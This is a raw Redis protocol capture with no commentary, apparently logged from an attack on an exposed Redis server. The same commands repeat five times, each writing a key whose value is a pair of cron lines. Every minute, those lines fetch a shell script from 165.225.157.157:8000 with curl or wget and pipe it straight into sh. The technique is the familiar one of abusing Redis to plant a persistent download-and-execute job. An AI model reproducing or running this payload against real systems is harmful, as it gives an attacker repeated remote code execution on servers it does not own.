*2
$6
SELECT
$1
0
*3
$3
set
$1
1
$124


*/1 * * * * curl -L http://165.225.157.157:8000/i.sh | sh
*/1 * * * * wget -q http://165.225.157.157:8000/i.sh -O - | sh


*2
$3
del
$1
1
*3
$3
set
$1
1
$124


*/1 * * * * curl -L http://165.225.157.157:8000/i.sh | sh
*/1 * * * * wget -q http://165.225.157.157:8000/i.sh -O - | sh


*2
$3
del
$1
1
*3
$3
set
$1
1
$124


*/1 * * * * curl -L http://165.225.157.157:8000/i.sh | sh
*/1 * * * * wget -q http://165.225.157.157:8000/i.sh -O - | sh


*2
$3
del
$1
1
*3
$3
set
$1
1
$124


*/1 * * * * curl -L http://165.225.157.157:8000/i.sh | sh
*/1 * * * * wget -q http://165.225.157.157:8000/i.sh -O - | sh


*2
$3
del
$1
1
*3
$3
set
$1
1
$124


*/1 * * * * curl -L http://165.225.157.157:8000/i.sh | sh
*/1 * * * * wget -q http://165.225.157.157:8000/i.sh -O - | sh


*2
$3
del
$1
1
